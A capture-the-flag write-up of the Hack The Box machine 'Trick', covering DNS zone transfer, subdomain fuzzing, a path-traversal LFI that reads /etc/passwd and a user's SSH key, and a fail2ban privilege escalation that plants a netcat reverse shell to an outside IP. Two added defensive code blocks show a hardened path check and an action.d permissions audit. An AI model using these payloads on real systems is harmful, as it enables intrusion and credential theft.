🕵️ HTB-Writeup : TRICK

Recon

nmap scan

└─$ rustscan -a 10.10.11.166 -b 4000 -- -Pn -sV -A  

 ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Rh57OmAndXFukHce0Tr4BL8CWC8yACwWdu8VZcBPGuMUH8VkvzqseeC8MYxt5SPL1aJmAsZSgOUreAJNlYNBBKjMoFwyDdArWhqDThlgBf6aqwqMRo3XWIcbQOBkrisgqcPnRKlwh+vqArsj5OAZaUq8zs7Q3elE6HrDnj779JHCc5eba+DR+Cqk1u4JxfC6mGsaNMAXoaRKsAYlwf4Yjhonl6A6MkWszz7t9q5r2bImuYAC0cvgiHJdgLcr0WJh+lV8YIkPyya1vJFp1gN4Pg7I6CmMaiWSMgSem5aVlKmrLMX10MWhewnyuH2ekMFXUKJ8wv4DgifiAIvd6AGR
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAoXvyMKuWhQvWx52EFXK9ytX/pGmjZptG8Kb+DOgKcGeBgGPKX3ZpryuGR44av0WnKP0gnRLWk7UCbqY3mxXU0=
|   256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGY1WZWn9xuvXhfxFFm82J9eRGNYJ9NnfzECUm0faUXm
25/tcp open  smtp    syn-ack Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
53/tcp open  domain  syn-ack ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    syn-ack nginx 1.14.2
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web server uses Bootstrap v5.1.3 for its forms.

Dirbuster scan

Dir found: / - 200
Dir found: /assets/ - 403
Dir found: /css/ - 403
Dir found: /assets/img/ - 403
Dir found: /js/ - 403
File found: /js/scripts.js - 200
Dir found: /assets/mp4/ - 403

DNS recon

└─$ dig ANY @10.10.11.166 trick.htb

; <<>> DiG 9.18.7-1-Debian <<>> ANY @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 30133
;; flags: qr aa rd; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 98c92c8f16cf9ce9863233fd6359458171615eae5c50db63 (good)
;; QUESTION SECTION:
;trick.htb.			IN	ANY

;; ANSWER SECTION:
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; ADDITIONAL SECTION:
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1

;; Query time: 51 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Wed Oct 26 16:34:41 CEST 2022
;; MSG SIZE  rcvd: 209

We find a SOA record containing another name, root.trick.htb. Next, I tried a DNS zone transfer (AXFR).

└─$ dig axfr @10.10.11.166 trick.htb

; <<>> DiG 9.18.7-1-Debian <<>> axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 156 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Wed Oct 26 21:28:07 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

We find a new subdomain preprod-payroll.trick.htb.

Browsing to it, we find a login.php page with an authentication form. Re-running dirbuster against the new subdomain turns up a few more PHP pages.


Vulnerability

Trying SQLi

I first tried to bypass the login form with SQL injection, using the HackTricks login bypass wordlist.

└─$ ffuf -u http://preprod-payroll.trick.htb/login.php -c -w /usr/share/wordlists/sqli.req  -X POST -d 'username=adminFUZZ&password=admin' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'

But it failed.

Fuzzing again

After some trouble, I realized that preprod-payroll.trick.htb is a pre-production host for the payroll service, so there may be other preprod subdomains.

└─$ ffuf -w /usr/share/wordlists/subdomains-top1mil.txt -H "Host: preprod-FUZZ.trick.htb" -u http://10.10.11.166 -fs 5480

marketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 121ms]
payroll                 [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 122ms]

We find a new subdomain preprod-marketing.trick.htb.

Pages on that subdomain are selected through the page parameter (http://preprod-marketing.trick.htb/index.php?page=home.html), so it may be vulnerable to LFI.

└─$ ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-ALL.txt -u "http://preprod-marketing.trick.htb/index.php?page=FUZZ" -fs 0 
....//....//....//....//etc/passwd

I found multiple working payloads.


LFI works!
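The `....//` form in the payload above survives a filter that strips `../` a single time, which is why it reaches files outside the web root. The following is an added example (not code from the writeup or from the target application) that shows that bypass against a naive filter and, beside it, an allowlist plus containment check that blocks it; the document root `/var/www/preprod-marketing` and the page allowlist are assumed.

```python
import os
from pathlib import Path

# Assumed document root and page allowlist; neither comes from the original writeup.
PAGES_DIR = Path("/var/www/preprod-marketing")
ALLOWED_PAGES = {"home.html", "about.html", "contact.html"}

def naive_filter(page):
    """Single-pass removal of '../', the kind of filter the '....//' payload defeats."""
    return page.replace("../", "")

def naive_resolve(page):
    """Where a PHP-style include(PAGES_DIR . '/' . $page) ends up after naive_filter."""
    return os.path.normpath(str(PAGES_DIR / naive_filter(page)))

def hardened_resolve(page):
    """Reject anything outside the allowlist, then confirm the resolved path
    still lives under PAGES_DIR (belt and braces against symlinks and '..')."""
    if page not in ALLOWED_PAGES:
        raise ValueError(f"page not in allowlist: {page!r}")
    root = PAGES_DIR.resolve()
    target = (root / page).resolve()
    if root not in target.parents:
        raise ValueError(f"path escapes document root: {target}")
    return target

if __name__ == "__main__":
    payload = "....//....//....//....//etc/passwd"   # payload shown in the writeup
    print("naive   :", naive_resolve(payload))        # /etc/passwd
    print("hardened:", hardened_resolve("home.html"))
    try:
        hardened_resolve(payload)
    except ValueError as err:
        print("hardened:", err)
```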

I first try to retrieve users' SSH keys.

GET /index.php?page=....//....//....//....//home/michael/.ssh/id_rsa HTTP/1.1
[...]

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
[...]
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

The user michael has an SSH key, so we can now log in over SSH.

michael@trick:~$ cat user.txt 
**************************9ff491

And get the user flag :)

Path to the privesc

Checking sudo permissions.

michael@trick:~$ sudo -l
Matching Defaults entries for michael on trick:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User michael may run the following commands on trick:
    (root) NOPASSWD: /etc/init.d/fail2ban restart

We are allowed to restart the fail2ban service as root. Looking at the configuration files, we see that the security group can write to the /etc/fail2ban/action.d directory, and, conveniently, michael is a member of the security group.

michael@trick:/etc/fail2ban$ id
uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)

I found an interesting article about a fail2ban privilege escalation. We now need a way to edit the iptables-multiport.conf action file and change its actionban entry. Since we have write permission on the directory, we can edit the file with sed.

We can replace the actionban entry with a reverse shell command with sed.

michael@trick:/etc/fail2ban$ sed -i -E "s\actionban =.*\actionban = /usr/bin/nc 10.10.16.11 4444 -e /usr/bin/bash\g" /etc/fail2ban/action.d/iptables-multiport.conf

michael@trick:/etc/fail2ban$ cat action.d/iptables-multiport.conf
# Option:  actionban
# Notes.:  command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values:  CMD
#
actionban = /usr/bin/nc 10.10.16.11 4444 -e /usr/bin/bash

michael@trick:/etc/fail2ban$ sudo /etc/init.d/fail2ban restart

Now, after 5 failed login attempts on the SSH service, fail2ban bans the source IP and runs the modified actionban command, which spawns the reverse shell.

└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.11.166] 39276
id
uid=0(root) gid=0(root) groups=0(root)

We can get the root flag :)
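The root cause here is a group-writable action.d directory combined with a sudo rule that restarts fail2ban, so the defensive check is to audit that directory for loose permissions and for action commands that invoke a shell or network tool. The following is an added example (not code from the writeup or from fail2ban) that performs that audit; the watchlist of suspicious commands and the sample action files it builds in a temporary directory are constructed for the demo, with a placeholder in place of the attacker address.

```python
import re
import stat
import tempfile
from pathlib import Path

# Interpreters and network tools that stock fail2ban actions never invoke
# (constructed watchlist; tune it to the actions actually deployed).
SUSPICIOUS = re.compile(r"(^|[\s/])(nc|ncat|netcat|socat|bash|python\d*|perl)(\s|$)")
ACTION_KEY = re.compile(r"^\s*(action(?:start|stop|check|ban|unban))\s*=\s*(.*\S)\s*$")

def is_group_or_world_writable(path):
    return bool(path.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_action_dir(action_dir):
    """Return (severity, message) findings for a fail2ban action.d directory:
    writable directory or files, and action commands that look like shells."""
    findings = []
    d = Path(action_dir)
    if is_group_or_world_writable(d):
        findings.append(("HIGH", f"{d} is group/world writable: members can add or replace actions"))
    for conf in sorted(d.glob("*.conf")):
        if is_group_or_world_writable(conf):
            findings.append(("HIGH", f"{conf.name} is group/world writable"))
        for lineno, line in enumerate(conf.read_text().splitlines(), 1):
            m = ACTION_KEY.match(line)
            if m and SUSPICIOUS.search(m.group(2)):
                findings.append(("HIGH", f"{conf.name}:{lineno} {m.group(1)} runs {m.group(2)!r}"))
    return findings

def demo():
    """Constructed action.d: a stock-looking action next to a tampered one, then audit it."""
    tmp = Path(tempfile.mkdtemp())
    tmp.chmod(0o775)  # group-writable directory, as on the box
    stock = tmp / "dummy.conf"
    stock.write_text("actionban = echo <ip> >> /var/run/fail2ban/fail2ban.dummy\n")
    stock.chmod(0o644)
    tampered = tmp / "iptables-multiport.conf"
    tampered.write_text("actionban = /usr/bin/nc ATTACKER_IP 4444 -e /usr/bin/bash\n")
    tampered.chmod(0o664)
    return audit_action_dir(tmp)

if __name__ == "__main__":
    for severity, message in demo():
        print(severity, message)
```

Run it against the real /etc/fail2ban/action.d with `audit_action_dir("/etc/fail2ban/action.d")`; an empty list means the directory and its files are owner-writable only and no action runs anything on the watchlist.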